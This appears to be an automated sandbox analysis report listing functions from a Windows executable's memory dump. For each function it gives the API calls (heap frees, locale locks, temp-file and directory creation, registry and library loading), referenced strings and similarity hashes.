Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 2955a52c3a264460aefed47d04d4095ec7042b120aadcd877b2ebb705ad2f21f
Instruction ID: 7c926d7cd2f54747ec9835be2f8c10eec89f47552b12e554ea217849c4240018
Opcode Fuzzy Hash: 2955a52c3a264460aefed47d04d4095ec7042b120aadcd877b2ebb705ad2f21f
Instruction Fuzzy Hash: 7B217E72A04216AFEB21CF49DC45BAAFBA8FB48710F14812EFA15D7350DB75A800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013D0A52, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 013D079E: _free.LIBCMT ref: 013D07C3

_free.LIBCMT ref: 013D0AA0

Part of subcall function 013CC4B8: RtlFreeHeap.NTDLL(00000000,00000000,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4CE
Part of subcall function 013CC4B8: GetLastError.KERNEL32(?,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4E0

_free.LIBCMT ref: 013D0AAB
_free.LIBCMT ref: 013D0AB6
_free.LIBCMT ref: 013D0B0A
_free.LIBCMT ref: 013D0B15
_free.LIBCMT ref: 013D0B20
_free.LIBCMT ref: 013D0B2B

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 318496740c0041acc38a05650c1544311583071c61c5cfb5e1384ed830c024f9
Instruction ID: fb98a64047a226f91794af0a68a42f6ec8877225cb80439723064ce240d2f554
Opcode Fuzzy Hash: 318496740c0041acc38a05650c1544311583071c61c5cfb5e1384ed830c024f9
Instruction Fuzzy Hash: FD1193B2540F05BAD521BBB4EC05FDBB79C5F20F08F408819B2DD6A050DE78BA448B50

Uniqueness

Uniqueness Score: -1.00%

Function 0131F790, Relevance: 9.1, APIs: 6, Instructions: 149COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0131F7DA
std::_Lockit::_Lockit.LIBCPMT ref: 0131F7FC
std::_Lockit::~_Lockit.LIBCPMT ref: 0131F824
__Getctype.LIBCPMT ref: 0131F8F5
std::_Facet_Register.LIBCPMT ref: 0131F957
std::_Lockit::~_Lockit.LIBCPMT ref: 0131F981

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: ee34e8bfd09aef12bf93887cd7978e328043ac0b4189f8350e27c6e5ed3ead9d
Instruction ID: 3f010731985945cf18052a711bdcfe90ba19015c9181529e1a6aca2c169084ec
Opcode Fuzzy Hash: ee34e8bfd09aef12bf93887cd7978e328043ac0b4189f8350e27c6e5ed3ead9d
Instruction Fuzzy Hash: 0A51DDB0C00619DFDB25DF58C580BAABBF8EF14318F14829DD945AB395E731AA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01297010, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 238COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 012970F5
__Init_thread_footer.LIBCMT ref: 0129716F

Strings

</a>, xrefs: 01297279
<a>, xrefs: 01297321
<a href=", xrefs: 012970B7

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer
String ID: </a>$<a href="$<a>
API String ID: 1385522511-4210067781
Opcode ID: 19f735f41bf7e06d5d7189aa820362425a27cc2bddaf4def6db34e3bdb49e5ed
Instruction ID: c166a299048992166467ae9b2d9f6d43e7f152eb062566bb5d6daec7309f58e1
Opcode Fuzzy Hash: 19f735f41bf7e06d5d7189aa820362425a27cc2bddaf4def6db34e3bdb49e5ed
Instruction Fuzzy Hash: ABA18CB0A20206DFDF14DF68D885BADB7F5FF55314F204259E515AB2A0EB70A940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012A05D0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0147C7FC,2F685009,00000000,0147C818), ref: 012A0643
LeaveCriticalSection.KERNEL32(0147C7FC), ref: 012A06A7
LoadCursorW.USER32(01290000,?), ref: 012A0700
LeaveCriticalSection.KERNEL32(0147C7FC), ref: 012A0798

Strings

ATL:%p, xrefs: 012A0720

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$CursorEnterLoad
String ID: ATL:%p
API String ID: 2080323225-4171052921
Opcode ID: f6635db1f53c08ebcf4eb2f58208df5f2a60aafef63bc20ed44404420b76d3eb
Instruction ID: 5a26a2b6ae11a2d65169bb1b8c9d11026276e7be86c8e8b41b901f2f201a8bd5
Opcode Fuzzy Hash: f6635db1f53c08ebcf4eb2f58208df5f2a60aafef63bc20ed44404420b76d3eb
Instruction Fuzzy Hash: 4851DA70D10B468BD731CF69C944AAAFBF4FF48714F10861EEA96A7650EB30B584CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01317410, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,2F685009,?,?,?,?,?,013DBF00,000000FF), ref: 01317453
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0131747C
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,013DBF00,000000FF), ref: 013174DC

Strings

RegCreateKeyTransactedW, xrefs: 01317476
Advapi32.dll, xrefs: 0131744E

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 4190037839-2994018265
Opcode ID: a38c793f914b0580ac419a9c0272f1ae4e7aa8f161abd43c699ad7780f06f45b
Instruction ID: 2114a71304df2c14cdcf4e45bf31ceb53ca6b89dba5f09d0c6dffec79882974d
Opcode Fuzzy Hash: a38c793f914b0580ac419a9c0272f1ae4e7aa8f161abd43c699ad7780f06f45b
Instruction Fuzzy Hash: DB31F772740209EFEB25CF49DC05FAABFA8FB44754F14802AF905E7284DB75A810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013CC266, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
_free.LIBCMT ref: 013CC2C8
_free.LIBCMT ref: 013CC2FE
SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

Strings

Pu#, xrefs: 013CC3F2

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID: Pu#
API String ID: 2283115069-1869624852
Opcode ID: 54e0bd4fd0bc1dafd2940dea94308496a5c761c39ece86cd5b7818d99429be54
Instruction ID: cd42aefc149dfcee51e0e2b141eef798bab6ee0ebb7ee42de7986d0b4d0a067d
Opcode Fuzzy Hash: 54e0bd4fd0bc1dafd2940dea94308496a5c761c39ece86cd5b7818d99429be54
Instruction Fuzzy Hash: 5D11A9762006062EFE3276FC6D85D2A2A5FDBD1D7D765133CF61C961E1DE258C018310

Uniqueness

Uniqueness Score: -1.00%

Function 013CB0A1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,013CB096,?,?,013CB05E,?,?,?), ref: 013CB0B6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 013CB0C9
FreeLibrary.KERNEL32(00000000,?,?,013CB096,?,?,013CB05E,?,?,?), ref: 013CB0EC

Strings

mscoree.dll, xrefs: 013CB0AF
CorExitProcess, xrefs: 013CB0C1

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 421f1eed409f6d28d52224342b1ed6bc1e88d2826f90efef7c9284c019a52420
Instruction ID: f1bd190358ae25a78b709ddc3ebf9fc38873acf6e18d6d8d4f29d9ef8e21ee5a
Opcode Fuzzy Hash: 421f1eed409f6d28d52224342b1ed6bc1e88d2826f90efef7c9284c019a52420
Instruction Fuzzy Hash: 08F0A731901228FBDB219B95DC0ABDDBF74EF41B59F144068F900A6164CB708F00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 012A2F20, Relevance: 7.8, APIs: 5, Instructions: 269COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0147C5AC,2F685009,?,?,?,?,?,?,?,?,?,?,?,?,00000000,013DE515), ref: 012A2F8A
GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,013DE515), ref: 012A300A
EnterCriticalSection.KERNEL32(0147C5C8,?,?,?,?,?,?,?,?,?,?,?,00000000,013DE515,000000FF), ref: 012A31C3
LeaveCriticalSection.KERNEL32(0147C5C8,?,?,?,?,?,?,?,?,?,?,00000000,013DE515,000000FF), ref: 012A31E4

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$FileLeaveModuleName
String ID:
API String ID: 1807155316-0
Opcode ID: 24b7468ef17ee3f026c2e6dcb34082bfb91e8dcb2189191be0161f6ab8f611c5
Instruction ID: ab1b5b7666b1f5533959c93eab87be5201f94bea5bb66395c4f750bfeaaa9d94
Opcode Fuzzy Hash: 24b7468ef17ee3f026c2e6dcb34082bfb91e8dcb2189191be0161f6ab8f611c5
Instruction Fuzzy Hash: E3B1B470A10259DFEB21CFA8C888BAEBBF5FF09314F544059E605EB351D775AA48CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013C87A1, Relevance: 7.8, APIs: 5, Instructions: 255COMMON

Download Yara Rule

APIs

Part of subcall function 013CC266: GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
Part of subcall function 013CC266: SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

_free.LIBCMT ref: 013C8A8C
_free.LIBCMT ref: 013C8AA5
_free.LIBCMT ref: 013C8AE3
_free.LIBCMT ref: 013C8AEC
_free.LIBCMT ref: 013C8AF8

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: c7bb53dba5b3132385368bad65c0d983f2fc6445990c485d0c95f3aaa8379eda
Instruction ID: d730fb97fdeb7de37f2e8a956216f4d2e7d500e6318684aa77526002950192c0
Opcode Fuzzy Hash: c7bb53dba5b3132385368bad65c0d983f2fc6445990c485d0c95f3aaa8379eda
Instruction Fuzzy Hash: B8B15875A0161ADFDB25DF18C884AA9B7B4FF58708F5085EED94AA7350DB30AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 013C8316, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 013CC4F2: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,013CD741,?,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC524

_free.LIBCMT ref: 013C8425
_free.LIBCMT ref: 013C843C
_free.LIBCMT ref: 013C8459
_free.LIBCMT ref: 013C8474
_free.LIBCMT ref: 013C848B

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: f796d6671b87acc17bace3654476f2d5e723355e4768700192a581d87f09182b
Instruction ID: 1814e1a0fa1898c10a696bc3d5b3b05d4bcd6eac31ebd9f65271f79bc756e135
Opcode Fuzzy Hash: f796d6671b87acc17bace3654476f2d5e723355e4768700192a581d87f09182b
Instruction Fuzzy Hash: 7851C132A00705AFDB21DF2DCC40A6AB7F5EF58B28B5445ADE909E7260E731EE018B50

Uniqueness

Uniqueness Score: -1.00%

Function 01323060, Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01323094
std::_Lockit::_Lockit.LIBCPMT ref: 013230B4
std::_Lockit::~_Lockit.LIBCPMT ref: 013230DC
std::_Facet_Register.LIBCPMT ref: 013231BB
std::_Lockit::~_Lockit.LIBCPMT ref: 013231E5

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 0ec1a9aabc60db5aeebc2342e7d65b1aeb88ab6ae3c7d13d755af0496bddcc87
Instruction ID: b3806e0f2368fb01c00b8a36be48187320f404eafe488a2ece299898fbec36cf
Opcode Fuzzy Hash: 0ec1a9aabc60db5aeebc2342e7d65b1aeb88ab6ae3c7d13d755af0496bddcc87
Instruction Fuzzy Hash: D351BFB0900219DFDB21EF58C580BAEBBB4FF04318F24815DD9466B791EB79AA05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01367730, Relevance: 7.6, APIs: 6, Instructions: 98memoryfileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,00000000,?,73B74D40,01367AFF,00000001,00000001), ref: 01367749
LocalFree.KERNEL32(?,?,73B74D40,01367AFF,00000001,00000001), ref: 01367759
GetLastError.KERNEL32(?,73B74D40,01367AFF,00000001,00000001), ref: 01367797
LocalAlloc.KERNEL32(00000040,00000014,?,73B74D40,01367AFF,00000001,00000001), ref: 013677D6
GetLastError.KERNEL32(?,73B74D40,01367AFF,00000001,00000001), ref: 013677F0
LocalFree.KERNEL32(?,?,73B74D40,01367AFF,00000001,00000001), ref: 01367801
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,2F685009,73B75870,?), ref: 013678A0
GetLastError.KERNEL32 ref: 013678BE

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Local$ErrorFreeLast$AllocCreateFile
String ID:
API String ID: 3567879408-0
Opcode ID: 2ce931c6222bf1489c2809da1d441e7e13b21d73fb305714c3bb9cd00cd3935e
Instruction ID: 01c906964ad8d8d49a8cdfd56527b991f30d2374a17c8fce19746eefaf8a53d5
Opcode Fuzzy Hash: 2ce931c6222bf1489c2809da1d441e7e13b21d73fb305714c3bb9cd00cd3935e
Instruction Fuzzy Hash: 683136706007019FEB30DF79D844B6BBBE8FF84619F44892EE546C6254E778E4098BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0129BB90, Relevance: 7.6, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0129BBF2
VariantClear.OLEAUT32(?), ref: 0129BC4B
VariantClear.OLEAUT32(?), ref: 0129BC55
VariantClear.OLEAUT32(?), ref: 0129BC5F
VariantClear.OLEAUT32(?), ref: 0129BC6C

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: 43595757f1a8291cf7d1365fa58c168560c743779813d54d8785c6460bf06a14
Instruction ID: 184c5fcea2e29288db5e60cf2267c5c8b77778d258cfb029371347361c8d2553
Opcode Fuzzy Hash: 43595757f1a8291cf7d1365fa58c168560c743779813d54d8785c6460bf06a14
Instruction Fuzzy Hash: EB312A71D15248EFDB01CFA8D944BDEBBF8EF49314F14869AE410E7290D7B5AA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D0527, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 013D053F

Part of subcall function 013CC4B8: RtlFreeHeap.NTDLL(00000000,00000000,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4CE
Part of subcall function 013CC4B8: GetLastError.KERNEL32(?,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4E0

_free.LIBCMT ref: 013D0551
_free.LIBCMT ref: 013D0563
_free.LIBCMT ref: 013D0575
_free.LIBCMT ref: 013D0587

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ff2849d10b4412242b9a8ce0f2dfb3dbbef3f62bf207817604298d640427625
Instruction ID: b5ea1d9970bf730f146499712975d7b973f8c297febc8457a24abd3e31091756
Opcode Fuzzy Hash: 4ff2849d10b4412242b9a8ce0f2dfb3dbbef3f62bf207817604298d640427625
Instruction Fuzzy Hash: 0DF0F473508D45EBE935EA6CF485C6977EEAB00A14BD59809F94DD7600CB34FC804B70

Uniqueness

Uniqueness Score: -1.00%

Function 01299040, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 253fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,?,00000000,?,2F685009,?), ref: 012990B2
MoveFileW.KERNEL32(?,00000000), ref: 012992BC

Part of subcall function 01299040: DeleteFileW.KERNEL32(?), ref: 01299306

Strings

Ph/, xrefs: 0129946A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$DeleteMoveNameTemp
String ID: Ph/
API String ID: 788073729-906322640
Opcode ID: 96ac6144e64f6255d4bb331f599ed733cda42a7fdc412a1b0fc79e6b87934e45
Instruction ID: be440fcdaa3011feaabf327df4d9fafc714783c89cde6152ef5e7bb26c7bcdd9
Opcode Fuzzy Hash: 96ac6144e64f6255d4bb331f599ed733cda42a7fdc412a1b0fc79e6b87934e45
Instruction Fuzzy Hash: 5AC17970C24269DADF25DF68C9987DDBBB4BF54308F1042D9D409A7290EB752B88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01363F10, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,2F685009,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 01363F44

Part of subcall function 0132A290: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,80004005,80004005,?,?,?,00000000,013F7A9D,000000FF), ref: 0132A2A8
Part of subcall function 0132A290: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,80004005,80004005,?,?,?,00000000,013F7A9D,000000FF), ref: 0132A2DB

Part of subcall function 012A0A40: RaiseException.KERNEL32(?,?,00000000,00000000,013B9368,C000008C,00000001,?,013B9399,00000000,?,01297AF7,00000000,2F685009,00000001,?), ref: 012A0A4C

Part of subcall function 01298440: HeapAlloc.KERNEL32(?,00000000,?,2F685009,00000000,013DBBA0,000000FF,?,?,01471B74,?,0135FF88,80004005,2F685009), ref: 0129848A

Strings

.jar, xrefs: 013643CC
.pack, xrefs: 01364281
*.*, xrefs: 01363FBA, 01363FCC, 01363FD4

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocExceptionHeapObjectRaiseSingleWait
String ID: *.*$.jar$.pack
API String ID: 1065105516-3892993289
Opcode ID: b534e4cf2e3d1226ea4a6f4fae42c0b5a15e1bc5431fc9d830bb9a62514ea6f0
Instruction ID: 39b01a319164f769b87299e5a08a69229ad93c73837a2402f514059808423a55
Opcode Fuzzy Hash: b534e4cf2e3d1226ea4a6f4fae42c0b5a15e1bc5431fc9d830bb9a62514ea6f0
Instruction Fuzzy Hash: 99518470E0061ADFDB10DFA9C844B6EFBB8FF45314F148269E525AB295DB35D904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01299480, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 01299503

Part of subcall function 013BBD10: EnterCriticalSection.KERNEL32(0147B82C,?,?,01298887,0147C45C,01413860), ref: 013BBD1A
Part of subcall function 013BBD10: LeaveCriticalSection.KERNEL32(0147B82C,?,01298887,0147C45C,01413860), ref: 013BBD4D
Part of subcall function 013BBD10: RtlWakeAllConditionVariable.NTDLL ref: 013BBDC4

__Init_thread_footer.LIBCMT ref: 01299589
CreateDirectoryW.KERNEL32(0147C7A0,00000000,?,00000000,811C9DC5,2F685009,?), ref: 012995FD

Part of subcall function 013BBD5A: EnterCriticalSection.KERNEL32(0147B82C,?,?,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBD65
Part of subcall function 013BBD5A: LeaveCriticalSection.KERNEL32(0147B82C,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBDA2

Strings

Ph/, xrefs: 012996A0

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionCreateDirectoryVariableWake
String ID: Ph/
API String ID: 2312781895-906322640
Opcode ID: 3db1c05cc2e2c766df495f6793ef0b4240a91f0b044599a0d456525edaf69148
Instruction ID: 8d15d346d0026ae415eb578df0e637c35f1b015aa495dc549310f78ee5c044db
Opcode Fuzzy Hash: 3db1c05cc2e2c766df495f6793ef0b4240a91f0b044599a0d456525edaf69148
Instruction Fuzzy Hash: 3C51B0B191024BDFDF20DFA8D884B9EFBB4FB14328F14466ED516A7294DB306A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01298D10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,?,00000000,?,2F685009,?,00000004), ref: 01298D6B
DeleteFileW.KERNEL32(?,?,00000004), ref: 01298DA8
CreateDirectoryW.KERNEL32(?,00000000,?,00000004), ref: 01298DB7

Strings

Ph/, xrefs: 01298E9B

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateDeleteDirectoryNameTemp
String ID: Ph/
API String ID: 2411147693-906322640
Opcode ID: a97126c2a113f7266932a53dce32b01535e9295ed4296968d1aed20397eaaf59
Instruction ID: bb8e79ace025616721f6bebc998af1822570926cd7524384178014b092cb86f1
Opcode Fuzzy Hash: a97126c2a113f7266932a53dce32b01535e9295ed4296968d1aed20397eaaf59
Instruction Fuzzy Hash: 50415D70D14259DADB14DF68C9987DDBBB8BF55304F1402DAD409AB280EBB86B84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012A4630, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON

